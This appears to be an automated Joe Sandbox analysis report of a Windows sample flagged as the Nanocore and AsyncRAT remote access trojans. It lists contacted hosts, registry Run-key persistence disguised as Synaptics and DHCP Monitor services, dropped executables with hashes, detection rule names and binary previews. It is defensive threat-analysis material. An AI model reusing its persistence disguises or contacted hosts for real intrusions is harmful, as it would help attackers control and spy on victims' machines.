https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl | WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq | Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.46 | docs.google.com | United States | 15169 | GOOGLEUS | false
54.38.136.57 | saw4.playit.gg | France | 16276 | OVHFR | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Private IPs
IP
192.168.2.1
127.0.0.1
                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:560001
                                                  Start date:26.01.2022
                                                  Start time:02:38:43
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 14m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:y8kdmHi6x3.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 43
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@47/38@27/5
                                                  EGA Information:
                                                  • Successful, ratio: 83.3%
                                                  HDC Information:
                                                  • Successful, ratio: 36.2% (good quality ratio 35.3%)
                                                  • Quality average: 81.3%
                                                  • Quality standard deviation: 25.1%
                                                  HCA Information:
                                                  • Successful, ratio: 95%
                                                  • Number of executed functions: 258
                                                  • Number of non-executed functions: 254
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.12.22, 52.109.8.24, 104.208.16.94
                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                  • Execution Graph export aborted for target SYSTEM32.EXE, PID 6952 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:39:40 | API Interceptor | 1x Sleep call for process: y8kdmHi6x3.exe modified
02:39:57 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
02:40:00 | API Interceptor | 40x Sleep call for process: Synaptics.exe modified
02:40:05 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
02:40:06 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" s>$(Arg0)
02:40:09 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
02:40:09 | API Interceptor | 674x Sleep call for process: ._cache_WINDOWS.EXE modified
02:41:27 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):208384
                                                  Entropy (8bit):7.451462755520174
                                                  Encrypted:false
                                                  SSDEEP:6144:ULV6Bta6dtJmakIM5n2B/XMekQlD/7W6Qyf0b:ULV6BtpmkbZXxVpQyf0b
                                                  MD5:568E6A074378730CEE0947C4C796372D
                                                  SHA1:7688894728B8207756F52384798E394DE8D54070
                                                  SHA-256:2F990B69464DAB55B2EBC8F6A302FE09E5767844B4AFB71B43A20A6C2EA48D8D
                                                  SHA-512:250A1215FD28E4CD5F6DA3E72B42A88F93664D4A2484D29F6141A81EF4968872B86379FB54AAF2E645D46EF8C881E43D1C32392DC3F7C381A86C252D7BDB2730
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 88%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 98%
                                                  Reputation:unknown
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:24576:jFYnnsJ39LyjbJkQFMhmC+6GD9vApfbZXJf:jFunsHyjtk2MYC5GDtA1
                                                  MD5:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  SHA1:335398BB44927DDB18905221C52A89AA101A3C7F
                                                  SHA-256:29BF88F94FFAB5559B5AF5A9DB05CFDBE2BEEB81301F1E64E851CFA925C930AC
                                                  SHA-512:B3B11F8E5B495C873A8AFA58FDC2F2FEF7E7D610A50516FB701DAB1197AC11A63E5F857F9B6ECF1A9B33FDF0D875ECF59695BE83FF35AFCBC23F8293D068E8FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 93%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2083328
                                                  Entropy (8bit):7.943244956522882
                                                  Encrypted:false
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  MD5:BFF363A92AC43FF249652A83DADC02AB
                                                  SHA1:3C7B47A3F4DC3C8555B656505244886CB3A172F5
                                                  SHA-256:D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580
                                                  SHA-512:8CEEF643926251A6D6B5FFEE6E662B68580992117D98DBD24CCFDE5CDAD429CE4719A92C63F470C2857272330C9F3A4A2D7F175A6300D6B1833A387F4B841D29
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 49%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):525
                                                  Entropy (8bit):5.2874233355119316
                                                  Encrypted:false
                                                  SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                  MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                  SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                  SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                  SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):525
                                                  Entropy (8bit):5.2874233355119316
                                                  Encrypted:false
                                                  SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                  MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                  SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                  SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                  SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1299
                                                  Entropy (8bit):5.353835388147306
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                  MD5:D7428B0428DC5FA72A41122D265CFA0E
                                                  SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                                  SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                                  SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1299
                                                  Entropy (8bit):5.353835388147306
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                  MD5:D7428B0428DC5FA72A41122D265CFA0E
                                                  SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                                  SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                                  SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:Microsoft Excel 2007+
                                                  Category:dropped
                                                  Size (bytes):18387
                                                  Entropy (8bit):7.523057953697544
                                                  Encrypted:false
                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4167168
                                                  Entropy (8bit):7.943250272423679
                                                  Encrypted:false
                                                  SSDEEP:98304:hAdDDetDKXiJb1VVmkMqYJlAdDDetDKXiJb1VVmkM3YJ:hAdmZHJxVVm/q6AdmZHJxVVm/3
                                                  MD5:FD4A5ADDD934F8102F8E9046F247E7E1
                                                  SHA1:969099E84FC39E8B7E11EA9B64E91004D0078D98
                                                  SHA-256:8E37D5419EF05382F863549AB137FED6077D554A208B2B8D7EE7C886A8BE9BC5
                                                  SHA-512:A4DC71877C688E77F7160268BED41369654BE049C5B465262FF65473F03B676ADE9070DC1956BCD357141909DC906E468A696A79B17357750C440853D6F40B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a......................#.....N.... ........@.. ........................@...........@.....................................K.......4.#...................?...................................................... ............... ..H............text...T.... ...................... ..`.rsrc...4.#.......#.................@..@.reloc........?.......?.............@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4171264
                                                  Entropy (8bit):7.942432292986639
                                                  Encrypted:false
                                                  SSDEEP:98304:dAdDDetDKXiJb1VVmkM2YJlAdDDetDKXiJb1VVmkM3YJ:dAdmZHJxVVm/26AdmZHJxVVm/3
                                                  MD5:46CFD9EFDDF98B4F1A57A69F3809D9BF
                                                  SHA1:5BD87CD64A90D8DDC194A9C3CA30A50F6136B7A5
                                                  SHA-256:7704A9C5892432FB9FC7598D2AA2043DDFE66774516E22081B5588B649942875
                                                  SHA-512:099FDDDBB8204118290FA34945B615C32FC43F35C014F7878541586FACB105E02845FCBBD7E3CF185BF3FDB3773F1EBF5D3E39776F3F9EDFB797D8B36DC69991
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 47%
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a......................#.....N.... ........@.. ........................@...........@.....................................K.........#...................?...................................................... ............... ..H............text...T.... ...................... ..`.rsrc.....#.......#.................@..@.reloc........?.......?.............@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
